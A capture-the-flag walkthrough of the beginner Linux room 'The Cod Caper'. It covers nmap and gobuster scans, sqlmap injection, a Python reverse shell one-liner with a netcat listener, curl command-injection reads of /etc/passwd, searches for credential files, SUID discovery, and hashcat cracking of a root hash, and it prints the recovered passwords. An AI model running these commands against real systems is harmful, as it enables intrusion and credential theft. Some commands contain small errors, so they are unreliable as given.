FOREWORD: We all get stuck which is why write-ups exist however, I would suggest you try your best to come up with the correct answer before seeking the answer. Most problems are meant to be solved but a process must be followed which is why I explain the various steps/commands used in order to arrive at a solution. Do your best ! Enjoy the process !
This Room is a beginner friendly room that allows users to infiltrate and exploit a Linux based system.
No answer needed
The objective of this task is to obtain as much information about any open ports on the gievn machine.
Useful flags :
| Flag | Use |
|---|---|
| -p | Used to specify which port to analyze. This can also be used to specify a range of ports i.e -p 1-1000 |
| -sV | Runs default scripts on the port, used for doing basic analysis on services running on a port |
| -A | Aggressive mode, obtains all related information |
To get this result an nmap scan must be done on all ports on the given IP address. Following the guide provided, I came up with
nmap -p 1-1000 -sC -A <GIVEN IP ADDRESS> which provides the following output and the answers to all of the questions in this section
From the given output it is determined that there are 2 open ports on the target machine.
Apache2 Ubuntu Default Page: It works
OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Apache/2.4.18
The objective of this task is to research the web server for any vulnerabilites using the gobuster tool which is a brute force tool.
Recommended tool: gobuster
| Flag | Use |
|---|---|
| -x | Specifies file extensions such as php,txt,html |
| -u | Specifies which URL to use |
| -t | Specifies the number of CPU threads to be used |
| --wordlist | Specifies which world list is appended to the url path such as "http://url.com/word1" "http://url.com/word2" |
| dir | Specifies directory to be enumerated |
The objective of this task is simple. The goal is to familiarize the user with useful commands needed to navigate servers in order to locate potential vulnerabilities.
From the previous excersise using nmap I found that port 80 is open on the machine. So I checked in the browser using the given IP which leads us to the default page.
With this information I am now able to use the Kali Gobuster tool to enumerate the directories.
When I combined the given flags with the given IP address (gobuster dir -u <GIVEN IP ADDRESS> --wordlist /usr/share/wordlists/dirb/common.txt -x html,php,txt) with the wordlist common.txt I came up with the following result :
Based off the output administrator.php seems to be an important file that would contain valuable information that could be exploited.
For this task the objective is to successfully crack the password to the administrator account SQLinjection, an open-sourced tool used to exploit servers.
| Flag | Use |
|---|---|
| -u | Specifies the URL to be attacked |
| --forms | Used to autoomaticaly select the parameters |
| --dump | Used to retrieve all data once the SQLI is found |
| -a | Retrieves all information from the database |
A SQL injection must be done to obtain this information using related commands and sqlmap. I used sqlmap -u http://<GIVEN IP ADDRESS>/administrator.php --forms --dump which gives this result and access to the website :
Using the output from the previous task we get secretpass
Once we are able to access the site we are brought to a command prompt screen. To find the number of vulnerabilites I simply re-used the command I used in question 1 WITHOUT the --dump option since we are only looking for the amount of vulnerabilites. sqlmap -u http://10.10.220.130/administrator.php --forms provides an ouptut of 3 SQLI forms.
Thai section requires research to determine if the users old account is active. If it is we are needing to find if specific files remain.
I obtained this answer by utilizing the ls function on the command screen that we gained access to from the previous excersise. The following output shows that there are 3 files:
To begin you need to open up a listening port using netcat on your machine nc -lnvp 1234
Reverse shell is needed to perform the command neccessary to solve this problem. I used python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<GIVEN IP ADDRESS>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
I used curl -s --data-urlencode "cmd=cat /etc/passwd" -X POST http://PROVIDED IP ADDRESS/2591c98b70119fe624898b1e424b5e91.php | grep -v -e "^$" | grep -v "<" .I used the curl command since we are transferring data and the flags needed to obtain the answer: yes
As you can see "Pingu" is still listed as an account.
So we figured out that Pingu still has an account. Now, we have to figure out the associated password. To do this we will need to use the find command to search through all of the files owned by Pingu. My first thought was to use the find command to search for any shadow files may contain passwords. find / 2>>/dev/null | grep -i shadow.
I found a backup shadow directory! Lets use cat to see the contents!
This didn't help. Next, I used the find command to search any content containing "pass" find / 2>>/dev/null | grep -i pass (I switched to the webpage interface for this one ) This is what populates:
/var/hidden/pass! Let's cat into this directory.
We found the password pinguapingu!
netcat
sqlmap
Python - Reverse Shell
curl
In this task the objective is to use LinEnum to download LinEnum and use it for priviledge escalation.
First, I used ssh and the login information obtained from the previous task to login as Pingu. *ssh pingu@<GIVEN IP ADDRESS>
Next I used the function find / -perm -u=s -type f 2>/dev/null to locate the SUID which gace me this:
A secret path? Sounds very interesting to me! /opt/secret/root
The next few tasks go over tools that can be used to carry out "Binary Exploitation". Everyone has their own way of doing things so various exploitation methods are explained. There are no tasks to be completed but there is a lot of information to retain and use for hte final tasks.
No answer needed
No answer needed
No answer needed
This task requires us to crack the root hash using the hash we received from the previous task $6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.It is recommended that we use the following hashcat {flags} {hashfile} {wordlist} with the following flags :
I copied the hash and saved it as a llama.txt. Now I am going to attempt cracking the file using hashcat -m 0 -a 0 -o llama.txt /usr/share/wordlists/rockyou.txt . Let's see what we get! FYI This may take a while
| Flag | Use |
|---|---|
| -a | Used to specify attack mode |
| -m | Used to specify which mode to use |
Got it ! love2fish
This room was a bit difficult for and took me longer than I expected. I spent a lot of time researching various tools and commands that I found myself unfamiliar with. However in the end I completed it which is all that matters!
Congratulations on completing The Cod Caper !